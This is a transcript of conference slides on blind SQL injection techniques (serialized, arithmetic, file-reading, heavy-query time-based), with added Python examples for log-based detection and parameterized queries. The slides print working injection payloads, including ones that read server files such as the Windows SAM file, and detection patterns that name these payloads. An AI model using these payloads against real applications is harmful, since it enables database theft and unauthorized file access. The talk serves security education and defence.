Transcript

  • 1. (Re) Playing with (Blind) SQL Injection. José Palazón “Palako”, Mobile Security at Yahoo!; Chema Alonso, Informatica64, Microsoft MVP Enterprise Security
  • 2. Spain (…not only bulls…)
  • 3. SQL Injection attacks: a long time ago, in a galaxy far, far away… http://www.phrack.org/issues.html?id=8&issue=54
  • 4. Agenda
    • Serialized SQL Injection
      • Demo: XML Extractor
    • Arithmetic SQL Injection
      • Divide by Zero
      • Sums and subtractions
      • Type overflow
      • Demo
    • Remote File Downloading using Blind SQL Injection
      • SQL Server
      • MySQL
      • Oracle
      • Demo: RFD Tool
    • Time-Based Blind SQL Injection using heavy queries
      • Demo: Marathon Tool
  • 5. Serialized SQL Injection
  • 6. Serialized SQL Injection
    • Goal: to merge complex result sets into a single showable field
    • XML serialization functions allow converting a result set into a single XML string.
    • It's possible to download large amounts of data with single, simple injections.
  • 7. SQL Server
    • FOR XML: Retrieves data as a single string representing an XML tree.
    • RAW: Mandatory option. Returns the result set with each row converted into an XML element of the form <row />.
    • BINARY BASE64: If this option is not explicitly specified, the query will fail on any BINARY data type column (containing images or passwords, for example).
      • union select '1','2','3',(select * from sysusers for xml raw, binary base64)
    • XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints.
      • Described by Dani Kachakil
  • 8. MySQL
    • No default XML support, requires a server side extension
    • GROUP_CONCAT (v 4.1+)
  • 9. Oracle
    • xmlforest, xmlelement,…
    • No * support
  • 10. Demo: Serialized SQL Injection
  • 11. Arithmetic Blind SQL Injection
  • 12. Blind Attacks
    • The attacker injects code but can't access the data directly.
    • However, the injection changes the behavior of the web application.
    • The attacker then looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.
      • Blind SQL Injection
      • Blind XPath Injection
      • Blind LDAP Injection
  • 13. Blind SQL Injection Attacks
    • Attacker injects:
      • “True where clauses”
      • “False where clauses”
      • Ex:
        • Program.php?id=1 and 1=1
        • Program.php?id=1 and 1=2
    • The program doesn't return any visible data from the database, not even in error messages.
    • The attacker can't see any data extracted from the database.
  • 14. Blind SQL Injection Attacks
    • Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”:
      • Different hashes
      • Different html structure
      • Different patterns (keywords)
      • Different linear ASCII sums
      • “Different behavior”
        • For example: response time
  • 15. Blind SQL Injection Attacks
    • If any difference exists, then:
      • Attacker can extract all information from database
      • How? Using “booleanization”
        • MySQL:
          • Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
            • “True-Answer Page” or “False-Answer Page”?
        • MSSQL:
          • Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers)
        • Oracle:
          • Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)) from all_users where rownum<=1)
  • 16. Arithmetic Blind SQL Injection
    • The query forces the parameter to be numeric
      • SELECT field FROM table WHERE id=abs( param )
    • Boolean logic is created with math operations
      • Divide by zero
      • Sums and subtractions
      • Type overflows
  • 17. Arithmetic Blind SQL Injection
    • Divide by zero (David Litchfield)
      • Id=A+(1/(ASCII(B)-C))
        • A-> Param value originally used in the query.
        • B -> Value we are searching for, e.g.: Substring(passwd,1,1)
        • C-> Counter [0..255]
      • When ASCII(B)=C, the DB will generate a divide by zero exception.
  • 18. Arithmetic Blind SQL Injection
    • Sums and subtractions
      • Id=A+ASCII(B)-C
        • A-> Param value originally used in the query.
        • B -> Value we are searching for, e.g.: Substring(passwd,1,1)
        • C-> Counter [0..255]
      • When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A
  • 19. Arithmetic Blind SQL Injection
    • Value type overflow
      • Id=A+((C/ASCII(B))*(K))
        • A-> Param value originally used in the query.
        • B -> Value we are searching for, e.g.: Substring(passwd,1,1)
        • C-> Counter [0..255]
        • K-> Value that overflows the type defined for A
          • (e.g. if A is an integer, then K=2^32)
      • When C/ASCII(B)==1, K*1 overflows the data type
  • 20. Demo:
    • Divide by zero
    • Sums and subtractions
    • Integer overflow
  • 21. Remote File Downloading using Blind SQL Injection techniques
  • 22. Accessing Files
    • Two ways:
      • Load the file in a temp table
        • and i>(select top 1 ASCII(Substring(column)(file,pos,1)) from temp_table ??
      • Load the file in the query
        • With every query the file is loaded in memory
        • I am very sorry, engine 
        • and i>ASCII(Substring(load_file(file,pos,1))??
  • 23. SQL Server 2K - External Data Sources
    • Only for known filetypes:
      • Access through drivers: txt, csv, xls, mdb, log
      • And 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:\;','select top 1 * from c:\dir\target.txt'),1,1))
    • Privileges
      • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers DisallowAdhocAccess=0
      • By default this key doesn't exist, so only users with the Server Admin role can use these functions.
    • NTFS permissions
  • 24. SQL Server 2K – Bulk option
    • Access to any file
      • ; Create Table TempTable as (row varchar(8000)) --
      • ; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n') --
      • ; alter table TempTable add num int IDENTITY(1,1) NOT NULL --
      • and (select COUNT(row) from TempTable)
      • and (select top 1 len(row) from TempTable where num = rownum)
      • and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1)
      • ; Drop Table TempTable--
    • Privileges needed
      • Server Role: Bulkadmin
      • Database Role: db_owner or db_ddladmin
    • NTFS permissions
  • 25. SQL Server 2k5 – 2k8
    • OPENDATASOURCE and OPENROWSET supported
    • Bulk options improved
      • AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))--
    • Permissions
      • Bulkadmin Server Role
      • External Data Sources enabled
      • sp_configure
      • Surface Area Configuration tool for features
  • 26. MySQL
    • LoadFile
      • SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
        • SQLbfTools: MySQLget command (illo and dab)
        • http://www.reversing.org/node/view/11
    • Load Data infile
      • ; Create table C8DFC643 (datos varchar(4000))
      • ; Load data infile 'c:\boot.ini' into table C8DFC643
      • ; alter table C8DFC643 add column num integer auto_increment unique key
      • and (select count(num) from C8DFC643)
      • and (select length(datos) from C8DFC643 where num = 1)
      • and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1)
      • ; Drop table C8DFC643
  • 27. Oracle – Plain Text files
    • External Tables
      • ; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; --
      • ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;--
      • Only Plain Text files
  • 28. Oracle – DBMS_LOB
    • ; execute immediate '
    • DECLARE l_bfile BFILE;
    • l_blob BLOB;
    • BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob;
    • l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');
    • DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);
    • DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile));
    • DBMS_LOB.fileclose(l_bfile);
    • COMMIT;
    • EXCEPTION
    • WHEN OTHERS THEN ROLLBACK;
    • END;'
    • ; end; --
  • 29. Demo RFD
  • 30. Time-based Blind SQL Injection using heavy queries
  • 31. Time-Based Blind SQL Injection
    • In scenarios with no differences between “True-Answer Page” and “False-Answer Page”, time delays can be used.
    • Injection forces a delay in the response page when the condition injected is True.
      • Delay functions:
        • SQL Server: waitfor
        • Oracle: dbms_lock.sleep
        • MySQL: sleep or benchmark function
        • Postgres: pg_sleep
      • Ex:
        • ; if (exists(select * from users)) waitfor delay '0:0:5'
  • 32. Exploit for Solar Empire Web Game
  • 33. Deep Blind SQL Injection
    • Time delay depends on the wanted value.
    • E.g. “a”->10s. delay, “b”->11s. Delay, …
    • http://labs.portcullis.co.uk/application/deep-blind-sql-injection/
  • 34. Time-Based Blind SQL Injection
    • What about database engines without delay functions, e.g. MS Access, Oracle connections without PL/SQL support, DB2, etc.?
    • Can we still exploit Time-Based Blind SQL Injection attacks?
  • 35. Yes, we can!
  • 36. “Where-Clause” execution order
    • Select “whatever”
    • From whatever
    • Where condition1 and condition2
    • Condition1 lasts 10 seconds
    • Condition2 lasts 100 seconds
    • Which condition should be executed first?
  • 37. The heavy condition first
    Condition2 (100 sec) | Condition1 (10 sec) | Condition2 & Condition1 | Response Time
    TRUE                 | FALSE               | FALSE                   | 110 sec
    TRUE                 | TRUE                | TRUE                    | 110 sec
    FALSE                | Not evaluated       | FALSE                   | 100 sec
  • 38. The light condition first
    Condition1 (10 sec) | Condition2 (100 sec) | Condition1 & Condition2 | Response Time
    TRUE                | FALSE                | FALSE                   | 110 sec
    TRUE                | TRUE                 | TRUE                    | 110 sec
    FALSE               | Not evaluated        | FALSE                   | 10 sec
  • 39. Time-Based Blind SQL Injection using Heavy Queries
    • The attacker can exploit by delaying the “True-answer page” using a heavy query.
    • It depends on how the database engine evaluates the where clauses in the query.
    • There are two types of database engines:
      • Databases without an optimization process
      • Databases with an optimization process
  • 40. Time-Based Blind SQL Injection using Heavy Queries
    • The attacker can inject a heavy cross-join condition to delay the response page in true injections.
    • The cross-join injection must be heavier than the other condition.
    • The attacker only has to know or guess the name of a table with select permission in the database.
    • Example in MSSQL:
      • Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
  • 41. “Default” tables to construct a heavy query
      • Microsoft SQL Server
        • sysusers
      • Oracle
        • all_users
      • MySQL (version 5)
        • information_schema.columns
      • Microsoft Access
        • MSysAccessObjects (97 & 2000 versions)
        • MSysAccessStorage (2003 & 2007)
  • 42. “Default” tables to construct a heavy query
    • … or whatever you can guess
      • Clients
      • Customers
      • News
      • Logins
      • Users
      • Providers
      • … use your imagination…
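The signals described in slides 31 through 42 (paired true/false boolean tests, per-engine delay functions, repeated catalog-table joins and the long response times they cause) are exactly what a defender can look for in web server logs. The following Python script is an added example, not part of the original slides or of the Marathon tool; the log line layout, the trailing response-time field and the 3 second threshold are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines: host, request, status, response time in ms.
# The layout (especially the response-time column) is an assumption; real servers
# need their own format configured for that field.
SAMPLE_LOG = """\
10.0.0.5 "GET /Program.php?id=1 HTTP/1.1" 200 120
10.0.0.5 "GET /Program.php?id=1%20and%201=1 HTTP/1.1" 200 130
10.0.0.5 "GET /Program.php?id=1%20and%201=2 HTTP/1.1" 200 95
10.0.0.7 "GET /Program.php?id=1%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,%20sysusers%20as%20sys2,%20sysusers%20as%20sys3)>1 HTTP/1.1" 200 14200
10.0.0.7 "GET /Program.php?id=1;%20if%20(exists(select%20*%20from%20users))%20waitfor%20delay%20'0:0:5' HTTP/1.1" 200 5100
10.0.0.9 "GET /news.php?id=42 HTTP/1.1" 200 88
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<ms>\d+)$'
)

# Signatures taken from the techniques in the deck.
BOOLEAN_RE = re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)          # slide 13: "and 1=1" / "and 1=2"
DELAY_RE = re.compile(                                                  # slide 31: delay functions
    r"\b(waitfor\s+delay|sleep\s*\(|benchmark\s*\(|pg_sleep\s*\(|dbms_lock\.sleep)", re.I
)
CATALOG_TABLES = (                                                      # slide 41: default heavy-query tables
    "sysusers", "all_users", "information_schema.columns",
    "msysaccessobjects", "msysaccessstorage",
)
SLOW_MS = 3000  # assumed baseline; tune to the endpoint's normal latency


def heavy_join_score(query):
    """How many times the most-repeated catalog table appears in one request.
    Two or more mentions is the shape of the self cross-join on slide 40."""
    q = query.lower()
    return max(q.count(t) for t in CATALOG_TABLES)


def classify(query, ms):
    """Return the list of signals a single decoded request trips (possibly empty)."""
    reasons = []
    if BOOLEAN_RE.search(query):
        reasons.append("boolean-test")
    if DELAY_RE.search(query):
        reasons.append("delay-function")
    if heavy_join_score(query) >= 2:
        reasons.append("heavy-query")
    if ms >= SLOW_MS:
        reasons.append("slow-response")
    return reasons


def detect_sqli_requests(log_text):
    """Return (host, decoded path, reasons) for every line that trips at least one signal."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the pipeline
        query = unquote_plus(m.group("path"))  # decode %20 etc. before matching
        reasons = classify(query, int(m.group("ms")))
        if reasons:
            alerts.append((m.group("host"), query, reasons))
    return alerts


if __name__ == "__main__":
    for host, path, reasons in detect_sqli_requests(SAMPLE_LOG):
        print(f"{host} {', '.join(reasons)}: {path}")
```

The slow-response signal is deliberately kept separate from the content signatures: on its own a 14 second page may just be a slow report, but a slow page whose query string also joins sysusers to itself three times is the heavy-query pattern from slide 40. The two true/false requests from the same host within seconds of each other are the cheap, always-available indicator from slide 13 and fire even when no engine-specific keyword is present.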
  • 43. Ex 1: MS SQL Server
    • Query lasts 14 seconds -> True-Answer
  • 44. Ex 1: MS SQL Server
    • Query lasts 1 second -> False-Answer
  • 45. Ex 2: Oracle
    • Query Lasts 22 seconds –> True-Answer
  • 46. Ex 2: Oracle
    • Query Lasts 1 second –> False-Answer
  • 47. Ex 3: Access 2000
    • Query Lasts 6 seconds –> True-Answer
  • 48. Ex 3: Access 2000
    • Query Lasts 1 second –> False-Answer
  • 49. Ex 4: Access 2007
    • Query Lasts 39 seconds –> True-Answer
  • 50. Ex 4: Access 2007
    • Query Lasts 1 second –> False-Answer
  • 51. Marathon Tool
    • Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases.
    • Schema Extraction from known databases
    • Extracts data using heavy queries no matter which database engine (without schema)
    • Developed in .NET
    • Source code available
  • 52. Demo: Marathon Tool
  • 53. Prevention: Don't forget Bobby Tables! SANITIZE YOUR QUERIES!
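Slide 53 is the only line on prevention, so here, as an added example that is not code from the slides, is the difference between building the WHERE clause by string concatenation and binding the value as a parameter, using Python's sqlite3 module on a constructed in-memory table. The table, the function names and the sample rows are assumptions. The point to notice is what the oracle from slide 13 depends on: with concatenation, "1 and 1=1" and "1 and 1=2" produce different results; with a bound parameter both are just a string that matches no id, so the True and False pages become identical and there is nothing to booleanize.

```python
import sqlite3


def make_db():
    """Constructed sample table; stands in for whatever Program.php queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", [(1, "first"), (2, "second")])
    return conn


def lookup_vulnerable(conn, param):
    """String concatenation: user-controlled text becomes part of the SQL grammar,
    so 'and 1=1' / 'and 1=2' change which rows come back (the blind oracle)."""
    sql = "SELECT title FROM news WHERE id=" + param
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, param):
    """Bound parameter: the value is sent separately from the statement and is
    never parsed as SQL. '1 and 1=2' is compared as a string against id and
    simply matches nothing, exactly like '1 and 1=1'."""
    return [row[0] for row in conn.execute("SELECT title FROM news WHERE id=?", (param,))]


def lookup_typed(conn, param):
    """Validate the type in application code before the value reaches the database.
    Slide 16 shows why wrapping the parameter in abs() inside the query is not the
    same thing: a numeric *query* still evaluates injected arithmetic. Returns None
    when the input is rejected (a web handler would answer 400 here)."""
    try:
        value = int(param)
    except ValueError:
        return None
    return lookup_parameterized(conn, value)


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1 and 1=1", "1 and 1=2"):
        print(f"{probe!r:14} concat={lookup_vulnerable(db, probe)!s:10} "
              f"bound={lookup_parameterized(db, probe)!s:10} typed={lookup_typed(db, probe)}")
```

Both hardened functions remove the true/false difference, but they do it for different reasons: the bound parameter keeps the value out of the SQL parser, and the integer check refuses the value before a query is even built. In practice the two are used together, and the same binding discipline closes the serialized (FOR XML), arithmetic, file-loading and heavy-query variants in the deck, since every one of them starts with attacker text being parsed as SQL.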
  • 54. Questions?
    • Speakers:
      • Chema Alonso ( [email_address] )
      • Palako ( [email_address] )
    • Authors
      • Chema Alonso ( [email_address] )
      • Alejandro Martín ( [email_address] )
      • Antonio Guzmán ( [email_address] )
      • Daniel Kachakil ( [email_address] )
      • José Palazón “Palako” ( [email_address] )
      • Marta Beltran ( [email_address] )